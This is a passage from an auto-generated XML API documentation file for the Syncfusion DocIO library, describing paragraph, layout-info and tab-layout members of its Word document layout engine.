            <value>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItemCollection"/> of the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.ParagraphFormat">
            <summary>
            Gets the paragraph format of the current paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> of the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.BreakCharacterFormat">
            <summary>
            Gets the character format for the break symbol. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> of the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.ListFormat">
            <summary>
            Gets the format for the list in the paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> of the list in the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsInCell">
            <summary>
            Gets a value indicating whether the current paragraph is in cell. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is in cell; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsEndOfSection">
            <summary>
            Gets a value indicating whether the current paragraph is end of the section. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is end of section; otherwise <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsEndOfDocument">
            <summary>
            Gets a value indicating whether the current paragraph is end of document. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is end of document; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsLastItem">
            <summary>
            Gets or sets a value indicating whether the Paragraph is last item in the Word document for Alternate chunk updated.
            </summary>
            <value>
              <c>true</c> if the paragraph is the last item in Alternate chunk document; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsNeedToSkip">
            <summary>
            Gets or sets a value indicating whether this instance is need to skip.
            </summary>
            <value>
            <c>true</c> if this instance is need to skip; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsTopMarginValueUpdated">
            <summary>
            Gets or sets a value indicating whether this instance is top margin value updated.
            </summary>
            <value>
            <c>true</c> if this instance is top margin value updated; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Syncfusion#Layouting#IWidgetContainer#Count">
            <summary>
            Gets count of child items.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Syncfusion#Layouting#IWidgetContainer#WidgetInnerCollection">
            <summary>
            Gets child widgets.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.Syncfusion#Layouting#IWidgetContainer#Item(System.Int32)">
            <summary>
            Gets child item by index.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.WidgetCollection">
            <summary>
            Gets the paragraph items collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IEntityCollectionBase"/> instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.RemoveEmpty">
            <summary>
            Gets or sets a value indicating whether to remove empty paragraph.
            </summary>
            <value>if its specifies to remove empty paragraph, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.LastItem">
            <summary>
            Gets the last item.
            </summary>
            <value>The last item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.ParaStyle">
            <summary>
            Gets the paragraph style.
            </summary>
            <value>The style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.SectionEndMark">
            <summary>
            Gets a value indicating whether the paragraph is section end mark.
            </summary>
            <value><c>true</c> if the paragraph is section end mark; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.IsTextReplaced">
            <summary>
            Gets or sets a value indicating whether this instance is text replaced.
            </summary>
            <value>
            <c>true</c> if this instance is text replaced; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl">
            <summary>
            The class specifies the Layout paragraph information.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ParagraphLayoutInfo">
            <summary>
            Summary description for ParagraphLayoutInfo.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.LayoutInfo">
            <summary>
            Summary description for LayoutInfo.
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.ILayoutInfo">
            <summary>
            Summary description for ILayoutInfo.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsClipped">
            <summary>
            Gets or sets a value indicating whether this instance is clipped.
            </summary>
            <value>
            	<c>true</c> if this instance is clipped; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsSkip">
            <summary>
            Gets a value indicating whether this instance is skip.
            </summary>
            <value><c>true</c> if this instance is skip; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsSkipBottomAlign">
            <summary>
            Gets or sets a value indicating whether this instance is skip bottom align.
            </summary>
            <value>
            	<c>true</c> if this instance is skip bottom align; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsLineContainer">
            <summary>
            Gets a value indicating whether this instance is line container.
            </summary>
            <value>
            	<c>true</c> if this instance is line container; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.ChildrenLayoutDirection">
            <summary>
            Gets the children layout direction.
            </summary>
            <value>The children layout direction.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsLineBreak">
            <summary>
            Gets or sets a value indicating whether this instance is line break.
            </summary>
            <value>
            	<c>true</c> if this instance is line break; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.TextWrap">
            <summary>
            Gets or sets a value indicating whether [text wrap].
            </summary>
            <value><c>true</c> if [text wrap]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsPageBreakItem">
            <summary>
            Gets or sets a value indicating whether this instance is page break item.
            </summary>
            <value>
            	<c>true</c> if this instance is page break item; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsFirstItemInPage">
            <summary>
            Gets a value indicating whether this instance is first Text Body Item of current page.
            </summary>
            <value>
            	<c>true</c> if this instance is first Text Body Item of current page; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsKeepWithNext">
            <summary>
            Gets or sets a value indicating whether this instance is keep with next.
            </summary>
            <value>
            	<c>true</c> if this instance is keep with next; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.IsHiddenRow">
            <summary>
            Gets or sets a value indicating whether this instance is hidden.
            </summary>
            <value>
            	<c>true</c> if this instance is hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutInfo.Size">
            <summary>
            Gets/Sets the Size of the widget
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutInfo.m_bFlags">
            <summary>
            
            </summary>
            
        </member>
        <member name="F:Syncfusion.Layouting.LayoutInfo.m_childrenLayoutDirection">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.LayoutInfo.m_size">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutInfo.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutInfo"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.LayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.Layouting.LayoutInfo"/> class.
            </summary>
            <param name="childLayoutDirection">The child layout direction.</param>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsClipped">
            <summary>
            Gets or sets a value indicating whether this instance is clipped.
            </summary>
            <value>
            	<c>true</c> if this instance is clipped; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.Size">
            <summary>
            Gets/Sets the Size of the Widget 
            Currently We have handled the Size property as specifically to get the text size of the TextRange and Empty textrange size of the paragraph.
            In Feature, We need to use this property to get the size of the all widgets
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsSkip">
            <summary>
            Gets a value indicating whether this instance is skip.
            </summary>
            <value><c>true</c> if this instance is skip; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsSkipBottomAlign">
            <summary>
            Gets or sets a value indicating whether this instance is skip bottom align.
            </summary>
            <value>
            	<c>true</c> if this instance is skip bottom align; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsVerticalText">
            <summary>
            Gets or sets a value indicating whether the owner table cell is having text direction as vertical
            </summary>
            <value>
            	<c>true</c> if this instance is having the text direction as vertical; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsLineContainer">
            <summary>
            Gets a value indicating whether this instance is line container.
            </summary>
            <value>
            	<c>true</c> if this instance is line container; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.ChildrenLayoutDirection">
            <summary>
            Gets the children layout direction.
            </summary>
            <value>The children layout direction.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsLineBreak">
            <summary>
            Gets or sets a value indicating whether this instance is line break.
            </summary>
            <value>
            	<c>true</c> if this instance is line break; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.TextWrap">
            <summary>
            Gets or sets a value indicating whether [text wrap].
            </summary>
            <value><c>true</c> if [text wrap]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsPageBreakItem">
            <summary>
            Gets or sets a value indicating whether this instance is page break item.
            </summary>
            <value>
            	<c>true</c> if this instance is page break item; otherwise, <c>false</c>.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.LayoutInfo.IsFirstItemInPage" -->
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsKeepWithNext">
            <summary>
            Gets or sets a value indicating whether this instance is keep with next.
            </summary>
            <value>
            	<c>true</c> if this instance is keep with next; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.LayoutInfo.IsHiddenRow">
            <summary>
            Gets or sets a value indicating whether this instance is hidden.
            </summary>
            <value>
            	<c>true</c> if this instance is hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="T:Syncfusion.Layouting.ILayoutSpacingsInfo">
            <summary>
            Summary description for ILayoutSpacingsInfo.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutSpacingsInfo.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ILayoutSpacingsInfo.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_topMargin">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_bottomMargin">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_levelNumber">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_justification">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_firstLineIndent">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_listTab">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_yPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_listValue">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_characterFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_listAlignment">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_listTabStop">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_xPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_listType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_paddings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.ParagraphLayoutInfo.m_margins">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.ParagraphLayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutParagraphInfo"/> class.
            </summary>
            <param name="childLayoutDirection">The child layout direction.</param>
        </member>
        <member name="M:Syncfusion.Layouting.ParagraphLayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutParagraphInfo"/> class.
            </summary>
            <param name="childLayoutDirection">The child layout direction.</param>
            <param name="isPageBreak">Is page break.</param>
        </member>
        <member name="M:Syncfusion.Layouting.ParagraphLayoutInfo.#ctor">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutParagraphInfo"/> class.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsPageBreak">
            <summary>
            Gets or sets a value indicating whether this instance is page break.
            </summary>
            <value>
            	<c>true</c> if this instance is page break; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.LevelNumber">
            <summary>
            Gets or sets the level number.
            </summary>
            <value>The level number.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.Justification">
            <summary>
            Gets or sets the justification.
            </summary>
            <value>The justification.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.FirstLineIndent">
            <summary>
            Gets or sets the first line indent.
            </summary>
            <value>The first line indent.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsKeepTogether">
            <summary>
            Gets or sets a value indicating whether this instance is keep together.
            </summary>
            <value>
            	<c>true</c> if this instance is keep together; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.ListTab">
            <summary>
            Gets or sets the list tab.
            </summary>
            <value>The list tab.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.YPosition">
            <summary>
            Gets or sets the Y position.
            </summary>
            <value>The Y position.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.ListValue">
            <summary>
            Gets or sets the list value.
            </summary>
            <value>The list value.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.CurrentListType">
            <summary>
            Gets or sets the Current list Type.
            </summary>
            <value>The list value.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.CharacterFormat">
            <summary>
            Gets or sets the character format for the list.
            </summary>
            <value>The character format.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.ListAlignment">
            <summary>
            Gets or sets alignment of the list number (left, right, or centered). 
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.ListTabStop">
            <summary>
            Gets or sets the current list tab stop.
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsFirstLine">
            <summary>
            Gets or sets a value indicating whether the line is the first line of the paragraph.
            </summary>
            <value>
            	<c>true</c> if this line is first line of the paragraph; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.TopMargin">
            <summary>
            Gets or sets TopMargin of the paragraph.
            </summary>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.Layouting.ParagraphLayoutInfo.BottomMargin" -->
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsNotFitted">
            <summary>
            Gets or sets a value indicating whether the paragraph is last paragraph of the page.
            </summary>
            <value>
            	<c>true</c> if this paragraph paragraph is last paragraph of the page; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsXPositionReUpdate">
            <summary>
            Gets or sets a value indicating whether [x position re update].
            </summary>
            <value>
              <c>true</c> if [x position re update]; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.XPosition">
            <summary>
            Gets or sets the X position.
            </summary>
            <value>The Y position.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.IsSectionEndMark">
            <summary>
            Gets or sets a value indicating whether this instance is section end mark.
            </summary>
            <value>
            <c>true</c> if this instance is section end mark; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.Paddings">
            <summary>
            Gets the paddings.
            </summary>
            <value>The paddings.</value>
        </member>
        <member name="P:Syncfusion.Layouting.ParagraphLayoutInfo.Margins">
            <summary>
            Gets the margins.
            </summary>
            <value>The margins.</value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.m_paragraph">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.#ctor(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl"/> class.
            </summary>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetEmptyTextRangeSize">
            <summary>
            Get the Empty size of the empty TextRange
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateLayoutInfoIsClipped">
            <summary>
            Updates IsClipped Property for the Paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Base Entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.InitListFormat">
            <summary>
            Determines the list format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateListParagraphSpacing(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Update List Paragraph After/Before spacing
            </summary>
            <param name="currentListFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateListWidth(Syncfusion.DocIO.DLS.WListLevel)">
            <summary>
            Updates the width of the list value, if the follow character is space or nothing.
            </summary>
            <param name="level">The level.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateListTab(Syncfusion.DocIO.DLS.WListLevel,System.Int32)">
            <summary>
            Updates the list tab.
            </summary>
            <param name="level"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateTabWidth(Syncfusion.DocIO.DLS.WListLevel,Syncfusion.DocIO.DLS.WParagraph.ListTabs,System.Single)">
            <summary>
            Updates the width of the tab, based on the list text.
            </summary>
            <param name="tabs">The tabs.</param>
            <param name="width">The width.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.CopyCharacterFormatting(Syncfusion.DocIO.DLS.WCharacterFormat,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Copys Character formatting
            </summary>
            <param name="destFormat"></param>
            <param name="sourceFormat"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.InitBorders">
            <summary>
            Determines the borders.
            </summary>
            <summary>
            Determines the borders.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.InitPageBreaks">
            <summary>
            Determines the page breaks.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.IsLastParagraphInTextBody">
            <summary>
            To identify the current paragraph is last paragraph of its owner textbody
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.InitFormat">
            <summary>
            Determines the format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateFirstParagraphMarginsBasedOnContextualSpacing">
            <summary>
            Check next and previous cell's paragraph and adjust its top and bottom margin of current paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateLastParagraphMarginsBasedOnContextualSpacing">
            <summary>
            Check next and previous cell's paragraph and adjust its top and bottom margin of current paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.IsParaHaveNumberingOrBullets">
            <summary>
            Returs true if para have bullets or numbering.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateParaMarginsBasedOnContextualSpacing(Syncfusion.DocIO.DLS.IEntity,Syncfusion.DocIO.DLS.IEntity)">
            <summary>
            Adjust the para top and bottom margin when next item or prev item is table and current para is not first or last para.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetInnerTableFirstPara(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Get the next table first paragraph.
            </summary>
            <param name="table"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.CheckOwnerTablePrevItem(Syncfusion.DocIO.DLS.WTable)">
            <summary>
            Check owner table previos item is table then its nested table continously iterates to get previous paragraph of  base table.
            </summary>
            <param name="ownerTable"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateParagraphSpacing">
            <summary>
            Update Paragraph After/Before Spacing
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.IsSameStyle(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            check whethere current para and next or previous para have same style.
            </summary>
            <param name="currParagraph"></param>
            <param name="nextOrPrevSibling"></param>
            <returns>if same style means return true else return false.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.UpdateTopMargin">
            <summary>
            Updates the top margin value based on previous section last paragraph after spacing.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetPrevSibling">
            <summary>
            Gets the previous sibling.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetNextSibling">
            <summary>
            Gets the next sibling.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.GetLastItemOfPreviousSection(System.Int32)">
            <summary>
            Gets the last item of previous section.
            </summary>
            <param name="currentSectionIndex">Index of the current section.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.IsParagraphContainsListtype(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determine whether the paragraph contains list type.
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WParagraph.LayoutParagraphInfoImpl.Document">
            <summary>
            Gets the document.
            </summary>
            <value>The document.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraph.ListTabs">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TabsLayoutInfo">
            <summary>
            Summary description for TabsLayoutInfo.
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_defaultTabWidth">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_pageMarginLeft">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_pageMarginRight">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_list">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_currTab">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_tabWidth">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.m_isTabWidthUpdatedBasedOnIndent">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.#ctor(Syncfusion.Layouting.ChildrenLayoutDirection)">
            <summary>
            Initializes a new instance of the <see cref="!:LayoutTabsInfo"/> class.
            </summary>
            <param name="childLayoutDirection">if set to <c>true</c> [b top subtract area].</param>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.GetNextTabPosition(System.Double)">
            <summary>
            Gets the next tab position.
            </summary>
            <param name="position">The position.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.AddTab(System.Single,Syncfusion.Layouting.TabJustification,Syncfusion.Layouting.TabLeader)">
            <summary>
            Adds the tab.
            </summary>
            <param name="position">The position.</param>
            <param name="justification">The justification.</param>
            <param name="leader">The leader.</param>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.SortParagraphTabsCollection(Syncfusion.DocIO.DLS.WParagraphFormat,Syncfusion.DocIO.DLS.TabCollection,System.Int32)">
            <summary>
            
            </summary>
            <param name="paragraphFormat"></param>
            <param name="listTabCollection"></param>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.UpdateTabs(System.Collections.Generic.Dictionary{System.Int32,Syncfusion.DocIO.DLS.TabCollection},System.Int32)">
            <summary>
            Updates the tabs.
            </summary>
            <param name="paragraphFormat">The paragraph format.</param>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.ClearDeleteTabPositions(System.Collections.Generic.Dictionary{System.Single,System.Int32},System.Collections.Generic.List{System.Int32})">
            <summary>        
            Remove the clear tab from the tabs collection
            </summary>
            <param name="delPosition"></param>
            <param name="tabLevels"></param>
        </member>
        <member name="M:Syncfusion.Layouting.TabsLayoutInfo.UpdateTabsCollection(Syncfusion.DocIO.DLS.Tab,System.Int32,System.Int32[],System.Collections.Generic.Dictionary{System.Single,System.Int32},System.Collections.Generic.List{System.Int32},System.Collections.Generic.Dictionary{System.Int32,Syncfusion.DocIO.DLS.TabCollection})">
            <summary>
            Update tabs collection
            </summary>
            <param name="tab"></param>
            <param name="currLevelIndex"></param>
            <param name="delPosition"></param>
            <param name="tabLevels"></param>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.DefaultTabWidth">
            <summary>
            Gets the width of the default tab.
            </summary>
            <value>The width of the default tab.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.PageMarginLeft">
            <summary>
            Gets the Page MarginLeft.
            </summary>
            <value>The Page MarginLeft.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.PageMarginRight">
            <summary>
            Gets the Page MarginRight.
            </summary>
            <value>The Page MarginRight.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.IsTabWidthUpdatedBasedOnIndent">
            <summary>
            Determine whether the tab preserved inbetween the indent
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.TabWidth">
            <summary>
            Gets/sets the width of the tab
            </summary>
            <value>The width of the tab.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.CurrTabLeader">
            <summary>
            Gets the current tab leader.
            </summary>
            <value>The current tab leader.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.CurrTabJustification">
            <summary>
            Gets the current tab justification.
            </summary>
            <value>The current tab justification.</value>
        </member>
        <member name="P:Syncfusion.Layouting.TabsLayoutInfo.LayoutTabList">
            <summary>
            Gets the layouted tab collections
            </summary>
        </member>
        <member name="T:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.m_jc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.Layouting.TabsLayoutInfo.LayoutTab.m_tlc">
